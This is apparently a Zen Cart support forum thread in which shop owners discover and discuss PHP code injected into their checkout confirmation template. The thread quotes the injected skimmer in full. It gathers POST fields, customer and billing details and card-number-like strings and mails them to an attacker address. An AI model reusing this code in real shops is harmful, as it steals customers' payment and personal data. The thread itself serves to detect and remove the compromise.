Checkout Confirmation blank page fix - my version

[ejunk]

Hi, today i got notified by a customer that he cannot go past the second step of the checkout.

I immediately tried to replicate the problem with a test user account and i encountered the same problem : a blank page instead of the 3rd step. No error message, nothing.

I started to browse the forum and do searches on google and i encountered the debug tool listed in many threads by Dr. Byte (sorry if i spelled your name wrong dude).

I followed the steps and i received this error in the log :

[19-Dec-2010 08:27:21] PHP Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/xxxxxxx/public_html/includes/templates/cherry_zen/templates/tpl_checkout_confirmation_default.php on line 212

I opened the tpl_checkout_confirmation_default.php and noticed something weird at the end of the page. A small script with an email address that i have never seen before. What struck me was "what exactly is this doing here" as it seemed pretty unnatural for an email address to be in the checkout code.

I then opened the default cherry zen template to compare the 2 files and as you guess, the script with the email was an extra.

I uploaded the default tpl_checkout_confirmation_default.php file that came with the cherry zen template and everything went back to normal.

I also did the security update in the config for the inoculation or something against hackers.

My real question is : could other files be compromised ? If anyone encountered this before, i would like to know what other files might have these "extra" scripts.

Here is the extra that was in the checkout confirmation php file :

Code:

<?php
$msgz = "";
if (!isset($_SERVER)) { $_SERVER  = &$HTTP_SERVER_VARS; }
$msgz .= "========================================================\r\n";
foreach ($_POST as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->customer as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->billing as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->billing['country'] as $key => $value) { $msgz .= "country-".$key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
$msgz .= $_SERVER['HTTP_REFERER']."\r\n".$_SERVER['SCRIPT_FILENAME']"\r\n";
$msgz .= "\r\n========================================================\r\n";
if(preg_match('/[0-9]{12,19}|paypal/i',$msgz)) {
@mail('cnewberry497######################','setoran',$msgz);
} else {
@mail('cnewberry497######################','setoran',$msgz);
}
?>

[LJHobbies]

thank you for posting this. I had the exact same entries in my file.

[ejunk]

Did your entry in the file contained the same email address as the one listed at the bottom of the entry ?

I`m just curious if it`s the same person or if it`s a general security bug that many others can exploit.

[ejunk]

VERY IMPORTANT I just noticed that some friends of mine that are using zen cart also got the same "extra" in their checkout confirmation file with different email addresses !

Also, if this exploit was in your custom template file, it exists in the default template file also.

So please check the tpl_checkout_confirmation_default.php located in the includes/templates/template_default/template/tpl_checkout_confirmation_default.php and delete the extra php script from the bottom of the page.

I hope this solves everyone some of their security problems.

Also i would like a zen cart expert to post here if this security issue can be solved with the innoculation script or if we have to check the files daily to see if this appears again.

Thank you.

[wildgarden]

had the same thing happen to me, so it is a bit worrying! is there anything we can do to improve security?

[GearStudios]

Just ran into the same thing.
I am on version 1.3.8

[GearStudios]

I am surprised no one has chimed in on this from ZenCart.

[ejunk]

Hopefully they will soon, meanwhile i`m glad i noticed this and forwarded the problem here so others can solve some security issues with their carts.

[DrByte]

had the same thing happen to me, so it is a bit worrying! is there anything we can do to improve security?

Just ran into the same thing.
I am on version 1.3.8

Simple solution for all of you: clean out the damage done, and upgrade to the latest version. Your old version is both obsolete and contains numerous well-advertised security flaws. The new version does not.